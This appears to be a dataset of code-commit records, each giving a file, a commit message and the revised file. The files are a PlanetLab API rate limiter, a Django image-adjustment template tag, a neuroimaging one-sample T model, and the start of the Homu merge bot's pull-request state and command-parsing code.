    when the counters for the last ``self.minutes`` minutes sum to more
    than ``self.requests``.
    """
    def __init__(self):
        self.config = Config("/etc/planetlab/plc_config")
        # FIXME: change with Config values
        self.prefix = "ratelimit"
        self.minutes = 5 # The time period
        self.requests = 50 # Number of allowed requests in that time period
        # Keys live one minute longer than the window they contribute to.
        self.expire_after = (self.minutes + 1) * 60
        self.whitelist = []
    def before(self, wobj, data, *args, **kwargs):
        # Counter layout, one key per (ip, minute):
        #   ratelimit_128.112.139.115_201011091532 = 1
        #   ratelimit_128.112.139.115_201011091533 = 14
        #   ratelimit_128.112.139.115_201011091534 = 11
        # On every request we work out the keys for the past five minutes and
        # use get_multi to retrieve them. If the sum of those counters exceeds
        # the maximum allowed for that time period, we block the request.
        api_method_name = wobj.name
        api_method_source = wobj.source
        # Local calls and whitelisted sources are never throttled.
        if api_method_source is None or api_method_source[0] == self.config.PLC_API_IP or api_method_source[0] in self.whitelist:
            return
        mc = memcache.Client(["%s:11211" % self.config.PLC_API_HOST])
        now = datetime.now()
        current_key = "%s_%s_%s" % (self.prefix, api_method_source[0], now.strftime("%Y%m%d%H%M"))
        keys_to_check = ["%s_%s_%s" % (self.prefix, api_method_source[0], (now - timedelta(minutes = minute)).strftime("%Y%m%d%H%M")) for minute in range(self.minutes + 1)]
        # incr raises ValueError when the key does not exist yet; treat
        # that the same as "no counter for this minute".
        try:
            value = mc.incr(current_key)
        except ValueError:
            value = None
        if value is None:
            mc.set(current_key, 1, time=self.expire_after)
        result = mc.get_multi(keys_to_check)
        total_requests = 0
        for i in result:
            total_requests += result[i]
        if total_requests > self.requests:
            # Log the rejected caller.  The file is closed explicitly;
            # the original leaked the handle.
            log = open("/var/log/plc_api_ratelimit.log", "a")
            try:
                date = datetime.now().strftime("%d/%m/%y %H:%M")
                log.write("%s - %s\n" % (date, api_method_source[0]))
                log.flush()
            finally:
                log.close()
            raise PLCPermissionDenied("Maximum allowed number of API calls exceeded")
    def after(self, wobj, data, *args, **kwargs):
        # Nothing to do after the wrapped call completes.
        return
class RateLimitAspect_class(BaseRateLimit):
    """Aspect wrapper exposing BaseRateLimit through pyaspects' MetaAspect."""
    __metaclass__ = MetaAspect
    name = "ratelimitaspect_class"
    def __init__(self):
        BaseRateLimit.__init__(self)
    def before(self, wobj, data, *args, **kwargs):
        # Delegate the pre-call rate-limit check to the base class.
        BaseRateLimit.before(self, wobj, data, *args, **kwargs)
    def after(self, wobj, data, *args, **kwargs):
        # Delegate the (no-op) post-call hook to the base class.
        BaseRateLimit.after(self, wobj, data, *args, **kwargs)
# Public alias used by consumers of this module.
RateLimitAspect = RateLimitAspect_class
Use Username while calculating the key
#!/usr/bin/python
#-*- coding: utf-8 -*-
#
# S.Çağlar Onur <caglar@cs.princeton.edu>
from PLC.Config import Config
from PLC.Faults import PLCPermissionDenied
from datetime import datetime, timedelta
from pyaspects.meta import MetaAspect
import memcache
class BaseRateLimit(object):
    """Per-IP rate limiting for PLC API calls, backed by memcached.

    One counter is kept per (caller IP, minute); a request is rejected
    when the counters for the last ``self.minutes`` minutes sum to more
    than ``self.requests``.
    """
    def __init__(self):
        self.config = Config("/etc/planetlab/plc_config")
        # FIXME: change with Config values
        self.prefix = "ratelimit"
        self.minutes = 5 # The time period
        self.requests = 50 # Number of allowed requests in that time period
        # Keys live one minute longer than the window they contribute to.
        self.expire_after = (self.minutes + 1) * 60
        self.whitelist = []
    def log(self, line):
        # BUG FIX: the original ``def log(self, line)`` was missing the
        # trailing colon (a SyntaxError).  The file handle is now also
        # closed instead of being leaked.
        """Append *line* to the rate-limit log with a timestamp."""
        log = open("/var/log/plc_ratelimit.log", "a")
        try:
            date = datetime.now().strftime("%d/%m/%y %H:%M")
            log.write("%s - %s\n" % (date, line))
            log.flush()
        finally:
            log.close()
    def before(self, wobj, data, *args, **kwargs):
        # Counter layout, one key per (ip, minute):
        #   ratelimit_128.112.139.115_201011091532 = 1
        #   ratelimit_128.112.139.115_201011091533 = 14
        #   ratelimit_128.112.139.115_201011091534 = 11
        # On every request we work out the keys for the past five minutes and
        # use get_multi to retrieve them. If the sum of those counters exceeds
        # the maximum allowed for that time period, we block the request.
        api_method_name = wobj.name
        api_method_source = wobj.source
        # NOTE(review): assumes the first positional argument is the auth
        # struct carrying "Username" — confirm against the caller.
        api_method_caller = args[0]["Username"]
        # Local calls and whitelisted sources are never throttled.
        if api_method_source is None or api_method_source[0] == self.config.PLC_API_IP or api_method_source[0] in self.whitelist:
            return
        if api_method_caller is None:
            self.log("%s called with Username = None" % api_method_source[0])
            return
        mc = memcache.Client(["%s:11211" % self.config.PLC_API_HOST])
        now = datetime.now()
        current_key = "%s_%s_%s" % (self.prefix, api_method_source[0], now.strftime("%Y%m%d%H%M"))
        keys_to_check = ["%s_%s_%s" % (self.prefix, api_method_source[0], (now - timedelta(minutes = minute)).strftime("%Y%m%d%H%M")) for minute in range(self.minutes + 1)]
        # incr raises ValueError when the key does not exist yet; treat
        # that the same as "no counter for this minute".
        try:
            value = mc.incr(current_key)
        except ValueError:
            value = None
        if value is None:
            mc.set(current_key, 1, time=self.expire_after)
        result = mc.get_multi(keys_to_check)
        total_requests = 0
        for i in result:
            total_requests += result[i]
        if total_requests > self.requests:
            self.log("%s - %s" % (api_method_source[0], api_method_caller))
            raise PLCPermissionDenied("Maximum allowed number of API calls exceeded")
    def after(self, wobj, data, *args, **kwargs):
        # Nothing to do after the wrapped call completes.
        return
class RateLimitAspect_class(BaseRateLimit):
    """Aspect wrapper exposing BaseRateLimit through pyaspects' MetaAspect."""
    __metaclass__ = MetaAspect
    name = "ratelimitaspect_class"
    def __init__(self):
        BaseRateLimit.__init__(self)
    def before(self, wobj, data, *args, **kwargs):
        # Delegate the pre-call rate-limit check to the base class.
        BaseRateLimit.before(self, wobj, data, *args, **kwargs)
    def after(self, wobj, data, *args, **kwargs):
        # Delegate the (no-op) post-call hook to the base class.
        BaseRateLimit.after(self, wobj, data, *args, **kwargs)
# Public alias used by consumers of this module.
RateLimitAspect = RateLimitAspect_class
|
from __future__ import absolute_import
from django import template
from django.conf import settings
from django.template.defaulttags import kwarg_re
from daguerre.utils.adjustments import get_adjustment_class, DEFAULT_ADJUSTMENT
from daguerre.views import get_image_resize_info
register = template.Library()
class ImageResizeNode(template.Node):
    """Template node that resolves an image and applies an adjustment.

    Renders the adjusted image's url, or — when ``asvar`` is given —
    stores the adjustment's info dict in the context and renders ''.
    """
    def __init__(self, image, kwargs=None, asvar=None):
        self.image = image
        # BUG FIX: render() iterates self.kwargs, so a None default
        # would raise AttributeError; normalize to an empty dict.
        self.kwargs = kwargs if kwargs is not None else {}
        self.asvar = asvar
    def render(self, context):
        image = self.image.resolve(context)
        kwargs = dict((k, v.resolve(context)) for k, v in self.kwargs.iteritems())
        adjustment_class = get_adjustment_class(kwargs.pop('adjustment', DEFAULT_ADJUSTMENT))
        adjustment = adjustment_class.from_image(image, **kwargs)
        if self.asvar is not None:
            context[self.asvar] = adjustment.info_dict()
            return ''
        return adjustment.url
@register.tag
def resize(parser, token):
    """
    Returns an instance of :class:`ImageProxy`, which can calculate the appropriate url for the resized version of an image, as well as knowing the actual resized width and height for the given parameters.
    Syntax::
        {% resize <image> [key=val key=val ...] [as <varname>] %}
    If only one of width/height is supplied, the proportions are automatically constrained.
    Cropping and resizing will each only take place if the relevant variables are defined.
    The optional keyword arguments must be among:
    * width
    * height
    * max_width
    * max_height
    * adjustment
    * crop
    """
    params = token.split_contents()
    # BUG FIX: ``tag`` must be assigned before the length check below;
    # previously the error path raised NameError instead of
    # TemplateSyntaxError.  split_contents() always yields the tag name.
    tag = params[0]
    if len(params) < 2:
        raise template.TemplateSyntaxError('"%s" template tag requires at least two arguments' % tag)
    image = parser.compile_filter(params[1])
    params = params[2:]
    asvar = None
    if len(params) > 1:
        # Trailing "as <varname>" stores the info dict instead of rendering a url.
        if params[-2] == 'as':
            asvar = params[-1]
            params = params[:-2]
    valid_kwargs = ('width', 'height', 'max_width', 'max_height', 'adjustment', 'crop')
    kwargs = {}
    for param in params:
        match = kwarg_re.match(param)
        if not match:
            raise template.TemplateSyntaxError("Malformed arguments to `%s` tag" % tag)
        name, value = match.groups()
        if name not in valid_kwargs:
            raise template.TemplateSyntaxError("Invalid argument to `%s` tag: %s" % (tag, name))
        kwargs[str(name)] = parser.compile_filter(value)
    return ImageResizeNode(image, kwargs=kwargs, asvar=asvar)
Renamed {% resize %} tag to {% adjust %} and clarified the docstring.
from __future__ import absolute_import
from django import template
from django.conf import settings
from django.template.defaulttags import kwarg_re
from daguerre.utils.adjustments import get_adjustment_class, DEFAULT_ADJUSTMENT
from daguerre.views import get_image_resize_info
register = template.Library()
class ImageResizeNode(template.Node):
    """Template node that resolves an image and applies an adjustment.

    Renders the adjusted image's url, or — when ``asvar`` is given —
    stores the adjustment's info dict in the context and renders ''.
    """
    def __init__(self, image, kwargs=None, asvar=None):
        self.image = image
        # BUG FIX: render() iterates self.kwargs, so a None default
        # would raise AttributeError; normalize to an empty dict.
        self.kwargs = kwargs if kwargs is not None else {}
        self.asvar = asvar
    def render(self, context):
        image = self.image.resolve(context)
        kwargs = dict((k, v.resolve(context)) for k, v in self.kwargs.iteritems())
        adjustment_class = get_adjustment_class(kwargs.pop('adjustment', DEFAULT_ADJUSTMENT))
        adjustment = adjustment_class.from_image(image, **kwargs)
        if self.asvar is not None:
            context[self.asvar] = adjustment.info_dict()
            return ''
        return adjustment.url
@register.tag
def adjust(parser, token):
    """
    Returns a url to the adjusted image, or (with ``as``) stores a variable in the context containing the results of :meth:`~Adjustment.info_dict`.
    Syntax::
        {% adjust <image> [key=val key=val ...] [as <varname>] %}
    If only one of width/height is supplied, the proportions are automatically constrained.
    Cropping and resizing will each only take place if the relevant variables are defined.
    The optional keyword arguments must be among:
    * width
    * height
    * max_width
    * max_height
    * adjustment
    * crop
    """
    params = token.split_contents()
    # BUG FIX: ``tag`` must be assigned before the length check below;
    # previously the error path raised NameError instead of
    # TemplateSyntaxError.  split_contents() always yields the tag name.
    tag = params[0]
    if len(params) < 2:
        raise template.TemplateSyntaxError('"%s" template tag requires at least two arguments' % tag)
    image = parser.compile_filter(params[1])
    params = params[2:]
    asvar = None
    if len(params) > 1:
        # Trailing "as <varname>" stores the info dict instead of rendering a url.
        if params[-2] == 'as':
            asvar = params[-1]
            params = params[:-2]
    valid_kwargs = ('width', 'height', 'max_width', 'max_height', 'adjustment', 'crop')
    kwargs = {}
    for param in params:
        match = kwarg_re.match(param)
        if not match:
            raise template.TemplateSyntaxError("Malformed arguments to `%s` tag" % tag)
        name, value = match.groups()
        if name not in valid_kwargs:
            raise template.TemplateSyntaxError("Invalid argument to `%s` tag: %s" % (tag, name))
        kwargs[str(name)] = parser.compile_filter(value)
    return ImageResizeNode(image, kwargs=kwargs, asvar=asvar)
import gc
import numpy as N
from scipy.sandbox.models.utils import recipr
from neuroimaging import traits
class OneSampleResults(object):
    """
    A container for results from fitting a (weighted) one sample T.

    Results are grouped under the 'mean' and 'varatio' keys and
    accessed with item syntax.
    """
    def __init__(self):
        mean_fields = ('mu', 'sd', 't', 'resid', 'df_resid', 'scale')
        self.values = {
            'mean': dict.fromkeys(mean_fields),
            'varatio': dict.fromkeys(('varatio', 'varfix')),
        }
    def __getitem__(self, key):
        return self.values[key]
    def __setitem__(self, key, val):
        self.values[key] = val
class OneSample(traits.HasTraits):
    """Fit a (weighted) one-sample T model.

    ``weight_type`` says how the W argument is interpreted ('sd', 'var'
    or direct 'weight'); ``niter`` controls the variance-ratio
    iteration count.
    """
    weight_type = traits.Trait('sd', 'var', 'weight')
    varatio = traits.Trait(traits.Any())
    varfix = traits.Trait(traits.Any())
    niter = traits.Int(10)
    use_scale = traits.true
    def __init__(self, **keywords):
        traits.HasTraits.__init__(self, **keywords)
    def estimate_varatio(self, Y, W, df=None):
        """Iteratively estimate the variance ratio and fixed variance.

        Y is the (nsubject, ...) data array, W the weights. Returns a
        OneSampleResults with the 'varatio' entries filled in.
        """
        Sreduction = 0.99
        S = 1. / W
        nsubject = Y.shape[0]
        df_resid = nsubject - 1
        R = Y - N.multiply.outer(N.ones(Y.shape[0]), N.mean(Y, axis=0))
        sigma2 = N.squeeze(N.add.reduce(N.power(R, 2), axis=0) / df_resid)
        minS = N.minimum.reduce(S, 0) * Sreduction
        Sm = S - N.multiply.outer(N.ones((nsubject,), N.float64), minS)
        for _ in range(self.niter):
            Sms = Sm + N.multiply.outer(N.ones((nsubject,), N.float64), sigma2)
            W = recipr(Sms)
            Winv = 1. / N.add.reduce(W, axis=0)
            mu = Winv * N.add.reduce(W * Y, axis=0)
            R = W * (Y - N.multiply.outer(N.ones(nsubject), mu))
            ptrS = 1 + N.add.reduce(Sm * W, 0) - \
                   N.add.reduce(Sm * N.power(W, 2), axis=0) * Winv
            sigma2 = N.squeeze((sigma2 * ptrS + N.power(sigma2, 2) *
                                N.add.reduce(N.power(R, 2), 0)) / nsubject)
        sigma2 = sigma2 - minS
        if df is None:
            df = N.ones((nsubject,), N.float64)
        df.shape = (1, nsubject)
        _Sshape = S.shape
        S.shape = (S.shape[0], N.product(S.shape[1:]))
        value = OneSampleResults()
        value['varatio']['varfix'] = N.dot(df, S) / df.sum()
        S.shape = _Sshape
        value['varatio']['varfix'].shape = _Sshape[1:]
        # BUG FIX: previously ``value.varfix``, which raises AttributeError —
        # OneSampleResults only supports item (dict-style) access.
        value['varatio']['varatio'] = N.nan_to_num(sigma2 /
                                                   value['varatio']['varfix'])
        return value
    def fit(self, Y, W, which='mean', df=None):
        """Dispatch to estimate_mean or estimate_varatio."""
        if which == 'mean':
            return self.estimate_mean(Y, W)
        else:
            return self.estimate_varatio(Y, W, df=df)
    def get_weights(self, W):
        """Convert W to 'weight'-type values according to weight_type."""
        try:
            if W.ndim == 1:
                W.shape = (W.shape[0], 1)
        except AttributeError:
            # W may be a plain scalar with no .ndim; leave it unchanged.
            pass
        if self.weight_type == 'sd':
            W = 1. / N.power(W, 2)
        elif self.weight_type == 'var':
            W = 1. / W
        return N.asarray(W)
    def estimate_mean(self, Y, W):
        """Weighted mean estimate with sd, t and scaled residuals."""
        if Y.ndim == 1:
            Y.shape = (Y.shape[0], 1)
        W = self.get_weights(W)
        if W.shape in [(), (1,)]:
            W = N.ones(Y.shape) * W
        nsubject = Y.shape[0]
        if self.varfix is not None:
            sigma2 = N.asarray(self.varfix * self.varatio)
            if sigma2.shape != ():
                sigma2 = N.multiply.outer(N.ones((nsubject,), N.float64), sigma2)
            S = recipr(W) + sigma2
            W = recipr(S)
        mu = N.add.reduce(Y * W, 0) / N.add.reduce(W, 0)
        value = OneSampleResults()
        value['mean']['df_resid'] = Y.shape[0] - 1
        value['mean']['resid'] = (Y - N.multiply.outer(N.ones(Y.shape[0], N.float64), mu)) * N.sqrt(W)
        if self.use_scale:
            scale = N.add.reduce(N.power(value['mean']['resid'], 2), 0) / value['mean']['df_resid']
        else:
            scale = 1.
        var_total = scale * recipr(N.add.reduce(W, 0))
        value['mean']['mu'] = mu
        value['mean']['sd'] = N.squeeze(N.sqrt(var_total))
        value['mean']['t'] = N.squeeze(value['mean']['mu'] * recipr(value['mean']['sd']))
        value['mean']['scale'] = N.sqrt(scale)
        return value
class OneSampleIterator(object):
    """Apply a OneSample fit to each data chunk yielded by an iterator."""
    def __init__(self, iterator, outputs=None):
        # BUG FIX: the default was a shared mutable list (``outputs=[]``);
        # use a None sentinel instead.
        self.iterator = iter(iterator)
        outputs = outputs if outputs is not None else []
        self.outputs = [iter(output) for output in outputs]
    def weights(self):
        """
        This method should get the weights from self.iterator.
        """
        return 1.
    def fit(self, **keywords):
        """
        Go through an iterator, instantiating model and passing data,
        going through outputs.
        """
        for data in self.iterator:
            W = self.weights()
            shape = data.shape[1:]
            results = OneSample().fit(data, W, **keywords)
            for output in self.outputs:
                out = output.extract(results)
                if output.nout > 1:
                    out.shape = (output.nout,) + shape
                else:
                    out.shape = shape
                output.next(data=out)
            # Release per-chunk results promptly; chunks can be large.
            del results
            gc.collect()
Clean up
import gc
import numpy as N
from scipy.sandbox.models.utils import recipr
from neuroimaging import traits
class OneSampleResults(object):
    """
    A container for results from fitting a (weighted) one sample T.

    Results are grouped under the 'mean' and 'varatio' keys and
    accessed with item syntax.
    """
    def __init__(self):
        mean_fields = ('mu', 'sd', 't', 'resid', 'df_resid', 'scale')
        self.values = {
            'mean': dict.fromkeys(mean_fields),
            'varatio': dict.fromkeys(('varatio', 'varfix')),
        }
    def __getitem__(self, key):
        return self.values[key]
    def __setitem__(self, key, val):
        self.values[key] = val
class OneSample(traits.HasTraits):
    """Fit a (weighted) one-sample T model.

    ``weight_type`` says how the W argument is interpreted ('sd', 'var'
    or direct 'weight'); ``niter`` controls the variance-ratio
    iteration count.
    """
    weight_type = traits.Trait('sd', 'var', 'weight')
    varatio = traits.Trait(traits.Any())
    varfix = traits.Trait(traits.Any())
    niter = traits.Int(10)
    use_scale = traits.true
    def __init__(self, **keywords):
        traits.HasTraits.__init__(self, **keywords)
    def estimate_varatio(self, Y, W, df=None):
        """Iteratively estimate the variance ratio and fixed variance.

        Y is the (nsubject, ...) data array, W the weights. Returns a
        OneSampleResults with the 'varatio' entries filled in.
        """
        Sreduction = 0.99
        S = 1. / W
        nsubject = Y.shape[0]
        df_resid = nsubject - 1
        R = Y - N.multiply.outer(N.ones(Y.shape[0]), N.mean(Y, axis=0))
        sigma2 = N.squeeze(N.add.reduce(N.power(R, 2), axis=0) / df_resid)
        minS = N.minimum.reduce(S, 0) * Sreduction
        Sm = S - N.multiply.outer(N.ones((nsubject,), N.float64), minS)
        for _ in range(self.niter):
            Sms = Sm + N.multiply.outer(N.ones((nsubject,), N.float64), sigma2)
            W = recipr(Sms)
            Winv = 1. / N.add.reduce(W, axis=0)
            mu = Winv * N.add.reduce(W * Y, axis=0)
            R = W * (Y - N.multiply.outer(N.ones(nsubject), mu))
            ptrS = 1 + N.add.reduce(Sm * W, 0) - \
                   N.add.reduce(Sm * N.power(W, 2), axis=0) * Winv
            sigma2 = N.squeeze((sigma2 * ptrS + N.power(sigma2, 2) *
                                N.add.reduce(N.power(R, 2), 0)) / nsubject)
        sigma2 = sigma2 - minS
        if df is None:
            df = N.ones((nsubject,), N.float64)
        df.shape = (1, nsubject)
        _Sshape = S.shape
        S.shape = (S.shape[0], N.product(S.shape[1:]))
        value = OneSampleResults()
        value['varatio']['varfix'] = N.dot(df, S) / df.sum()
        S.shape = _Sshape
        value['varatio']['varfix'].shape = _Sshape[1:]
        # BUG FIX: previously ``value.varfix``, which raises AttributeError —
        # OneSampleResults only supports item (dict-style) access.
        value['varatio']['varatio'] = N.nan_to_num(sigma2 /
                                                   value['varatio']['varfix'])
        return value
    def fit(self, Y, W, which='mean', df=None):
        """Dispatch to estimate_mean or estimate_varatio."""
        if which == 'mean':
            return self.estimate_mean(Y, W)
        else:
            return self.estimate_varatio(Y, W, df=df)
    def get_weights(self, W):
        """Convert W to 'weight'-type values according to weight_type."""
        try:
            if W.ndim == 1:
                W.shape = (W.shape[0], 1)
        except AttributeError:
            # W may be a plain scalar with no .ndim; leave it unchanged.
            pass
        if self.weight_type == 'sd':
            W = 1. / N.power(W, 2)
        elif self.weight_type == 'var':
            W = 1. / W
        return N.asarray(W)
    def estimate_mean(self, Y, W):
        """Weighted mean estimate with sd, t and scaled residuals."""
        if Y.ndim == 1:
            Y.shape = (Y.shape[0], 1)
        W = self.get_weights(W)
        if W.shape in [(), (1,)]:
            W = N.ones(Y.shape) * W
        nsubject = Y.shape[0]
        if self.varfix is not None:
            sigma2 = N.asarray(self.varfix * self.varatio)
            if sigma2.shape != ():
                sigma2 = N.multiply.outer(N.ones((nsubject,), N.float64), sigma2)
            S = recipr(W) + sigma2
            W = recipr(S)
        mu = N.add.reduce(Y * W, 0) / N.add.reduce(W, 0)
        value = OneSampleResults()
        value['mean']['df_resid'] = Y.shape[0] - 1
        value['mean']['resid'] = (Y - N.multiply.outer(N.ones(Y.shape[0], N.float64), mu)) * N.sqrt(W)
        if self.use_scale:
            scale = N.add.reduce(N.power(value['mean']['resid'], 2), 0) / value['mean']['df_resid']
        else:
            scale = 1.
        var_total = scale * recipr(N.add.reduce(W, 0))
        value['mean']['mu'] = mu
        value['mean']['sd'] = N.squeeze(N.sqrt(var_total))
        value['mean']['t'] = N.squeeze(value['mean']['mu'] * recipr(value['mean']['sd']))
        value['mean']['scale'] = N.sqrt(scale)
        return value
class OneSampleIterator(object):
    """Apply a OneSample fit to each data chunk yielded by an iterator."""
    def __init__(self, iterator, outputs=None):
        # BUG FIX: the default was a shared mutable list (``outputs=[]``);
        # use a None sentinel instead.
        self.iterator = iter(iterator)
        outputs = outputs if outputs is not None else []
        self.outputs = [iter(output) for output in outputs]
    def weights(self):
        """
        This method should get the weights from self.iterator.
        """
        return 1.
    def fit(self, **keywords):
        """
        Go through an iterator, instantiating model and passing data,
        going through outputs.
        """
        for data in self.iterator:
            W = self.weights()
            shape = data.shape[1:]
            results = OneSample().fit(data, W, **keywords)
            for output in self.outputs:
                out = output.extract(results)
                if output.nout > 1:
                    out.shape = (output.nout,) + shape
                else:
                    out.shape = shape
                output.next(data=out)
            # Release per-chunk results promptly; chunks can be large.
            del results
            gc.collect()
|
import argparse
from datetime import datetime, timezone
import github3
import os
import toml
import json
import re
from .database import Database
from . import utils
import logging
from threading import Thread, Lock
import time
import traceback
import requests
from contextlib import contextmanager
from functools import partial
from itertools import chain
from queue import Queue
import signal
# Lower value sorts earlier in the merge queue (see PullReqState.sort_key).
STATUS_TO_PRIORITY = {
    'success': 0,
    'pending': 1,
    'approved': 2,
    '': 3,
    'error': 4,
    'failure': 5,
}
# Message attached when Homu interrupts a buildbot build, and the regex
# used to recognize those interruption messages later.
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
@contextmanager
def buildbot_sess(repo_cfg):
    """Yield an HTTP session logged in to the repo's buildbot.

    Logs in with the credentials from ``repo_cfg['buildbot']`` on entry
    and logs out again when the ``with`` block exits.
    """
    sess = requests.Session()
    sess.post(repo_cfg['buildbot']['url'] + '/login', allow_redirects=False, data={
        'username': repo_cfg['buildbot']['username'],
        'passwd': repo_cfg['buildbot']['password'],
    })
    yield sess
    sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
class PullReqState:
    """In-memory state for a single pull request, mirrored to the database.

    The class attributes below serve as defaults for per-instance state.
    """
    num = 0
    priority = 0
    rollup = False
    title = ''
    body = ''
    head_ref = ''
    base_ref = ''
    assignee = ''
    def __init__(self, num, head_sha, status, repo_label, mergeable_que, gh,
                 owner, name, repos):
        # Reset per-commit fields first (without touching the DB).
        self.head_advanced('', use_db=False)
        self.num = num
        self.head_sha = head_sha
        self.status = status
        self.repo_label = repo_label
        self.mergeable_que = mergeable_que
        self.gh = gh
        self.owner = owner
        self.name = name
        self.repos = repos
        self.db = Database()
    def head_advanced(self, head_sha, *, use_db=True):
        """Reset all per-commit state after the PR head moves to *head_sha*."""
        self.head_sha = head_sha
        self.approved_by = ''
        self.status = ''
        self.merge_sha = ''
        self.build_res = {}
        self.try_ = False
        self.mergeable = None
        if use_db:
            self.set_status('')
            self.set_mergeable(None)
            self.init_build_res([])
    def __repr__(self):
        return 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'.format(
            self.owner,
            self.name,
            self.num,
            self.approved_by,
            self.priority,
            self.status,
        )
    def sort_key(self):
        # Queue ordering: status first, then mergeability, approval,
        # rollup flag, explicit priority (descending), and PR number.
        return [
            STATUS_TO_PRIORITY.get(self.get_status(), -1),
            1 if self.mergeable is False else 0,
            0 if self.approved_by else 1,
            1 if self.rollup else 0,
            -self.priority,
            self.num,
        ]
    def __lt__(self, other):
        return self.sort_key() < other.sort_key()
    def add_comment(self, text):
        """Post *text* as an issue comment, caching the issue object."""
        issue = getattr(self, 'issue', None)
        if not issue:
            issue = self.issue = self.get_repo().issue(self.num)
        issue.create_comment(text)
    def set_status(self, status):
        """Set the build status and persist it (and merge_sha) to the DB."""
        self.status = status
        sql = 'UPDATE pull SET status = %s WHERE repo = %s AND num = %s'
        with self.db.get_connection() as db_conn:
            db_conn.cursor().execute(sql, [self.status, self.repo_label,
                                           self.num])
            db_conn.commit()
            # FIXME: self.try_ should also be saved in the database
            if not self.try_:
                sql = 'UPDATE pull SET merge_sha = %s WHERE repo = %s AND num = %s'
                db_conn.cursor().execute(sql, [self.merge_sha, self.repo_label,
                                               self.num])
                db_conn.commit()
    def get_status(self):
        # An empty status with an approval and no known merge conflict
        # is reported as 'approved'.
        return 'approved' if self.status == '' and self.approved_by and self.mergeable is not False else self.status
    def set_mergeable(self, mergeable, *, cause=None, que=True):
        """Record mergeability; None means unknown (optionally re-queue a check)."""
        if mergeable is not None:
            self.mergeable = mergeable
            sql = 'REPLACE INTO mergeable (repo, num, mergeable) ' \
                  'VALUES (%s, %s, %s)'
            with self.db.get_connection() as db_conn:
                db_conn.cursor().execute(sql, [self.repo_label, self.num,
                                               self.mergeable])
                db_conn.commit()
        else:
            if que:
                # Let the fetch_mergeability worker resolve it later.
                self.mergeable_que.put([self, cause])
            else:
                self.mergeable = None
            with self.db.get_connection() as db_conn:
                sql = 'DELETE FROM mergeable WHERE repo = %s AND num = %s'
                db_conn.cursor().execute(sql, [self.repo_label, self.num])
                db_conn.commit()
    def init_build_res(self, builders, *, use_db=True):
        """Reset per-builder results for a fresh build."""
        self.build_res = {x: {
            'res': None,
            'url': '',
        } for x in builders}
        if use_db:
            with self.db.get_connection() as db_conn:
                sql = 'DELETE FROM build_res WHERE repo = %s AND num = %s'
                db_conn.cursor().execute(sql, [self.repo_label, self.num])
                db_conn.commit()
    def set_build_res(self, builder, res, url):
        """Record one builder's outcome and persist it."""
        if builder not in self.build_res:
            raise Exception('Invalid builder: {}'.format(builder))
        self.build_res[builder] = {
            'res': res,
            'url': url,
        }
        with self.db.get_connection() as db_conn:
            db_conn.cursor().execute('REPLACE INTO build_res ' \
                                     '(repo, num, builder, res, url, ' \
                                     'merge_sha) VALUES ' \
                                     '(%s, %s, %s, %s, %s, %s)',
                                     [self.repo_label, self.num, builder, res,
                                      url, self.merge_sha])
            db_conn.commit()
    def build_res_summary(self):
        """One-line human-readable summary of all builder results."""
        return ', '.join('{}: {}'.format(builder, data['res'])
                         for builder, data in self.build_res.items())
    def get_repo(self):
        """Return the github3 repository object, fetching it lazily."""
        repo = self.repos[self.repo_label]
        if not repo:
            self.repos[self.repo_label] = repo = self.gh.repository(self.owner, self.name)
            assert repo.owner.login == self.owner
            assert repo.name == self.name
        return repo
    def save(self):
        """Persist the full PR row to the database."""
        with self.db.get_connection() as db_conn:
            db_conn.cursor().execute('REPLACE INTO pull ' \
                                     '(repo, num, status, merge_sha, title, ' \
                                     'body, head_sha, head_ref, base_ref, ' \
                                     'assignee, approved_by, priority, ' \
                                     'try_, rollup) VALUES (%s, %s, %s, %s, ' \
                                     '%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
                                     [self.repo_label, self.num, self.status,
                                      self.merge_sha, self.title, self.body,
                                      self.head_sha, self.head_ref,
                                      self.base_ref, self.assignee,
                                      self.approved_by, self.priority,
                                      self.try_, self.rollup])
            db_conn.commit()
    def refresh(self):
        """Re-fetch title and body from GitHub."""
        issue = self.get_repo().issue(self.num)
        self.title = issue.title
        self.body = issue.body
def sha_cmp(short, full):
    """Return True when *short* (at least 4 chars) is a prefix of *full*."""
    if len(short) < 4:
        return False
    return full.startswith(short)
def sha_or_blank(sha):
    """Return *sha* when it looks like a lowercase hex SHA, else ''."""
    if re.match(r'^[0-9a-f]+$', sha):
        return sha
    return ''
def parse_commands(body, username, repo_cfg, state, my_username, *,
                   realtime=False, sha=''):
    """Parse Homu commands addressed to @my_username in a comment body.

    Mutates *state* according to the commands found (r+/r-, p=, retry,
    try, rollup, force, clean) and returns True when any command was
    recognized.  ``realtime`` distinguishes live webhook events from
    historical replay; replies are only posted in realtime mode.
    """
    # Only configured reviewers (or the bot itself) may issue commands.
    if 'ALL' != repo_cfg['reviewers'] and \
       username not in repo_cfg['reviewers'] and \
       username != my_username:
        return False
    state_changed = False
    # Tokenize only the lines that mention the bot.
    words = list(chain.from_iterable(re.findall(r'\S+', x) for x in body.splitlines() if '@' + my_username in x))
    # Iterate in reverse so a word can consume its following token (the SHA).
    for i, word in reversed(list(enumerate(words))):
        found = True
        if word == 'r+' or word.startswith('r='):
            # Approval; an optional next token pins the approved SHA.
            if not sha and i+1 < len(words):
                cur_sha = sha_or_blank(words[i+1])
            else:
                cur_sha = sha
            approver = word[len('r='):] if word.startswith('r=') else username
            if sha_cmp(cur_sha, state.head_sha):
                state.approved_by = approver
                state.save()
            elif realtime and username != my_username:
                if cur_sha:
                    msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
                    state.add_comment(':question: {} Please try again with '
                                      '`{:.7}`.'.format(msg, state.head_sha))
                else:
                    state.add_comment(':pushpin: Commit {:.7} has been approved by `{}`\n\n<!-- @{} r={} {} -->'.format(state.head_sha, approver, my_username, approver, state.head_sha))
        elif word == 'r-':
            # Revoke approval.
            state.approved_by = ''
            state.save()
        elif word.startswith('p='):
            # Set queue priority; non-integers are silently ignored.
            try: state.priority = int(word[len('p='):])
            except ValueError: pass
            state.save()
        elif word == 'retry' and realtime:
            state.set_status('')
        elif word in ['try', 'try-'] and realtime:
            # Toggle try mode and clear any previous merge/build state.
            state.try_ = word == 'try'
            state.merge_sha = ''
            state.init_build_res([])
            state.save()
        elif word in ['rollup', 'rollup-']:
            state.rollup = word == 'rollup'
            state.save()
        elif word == 'force' and realtime:
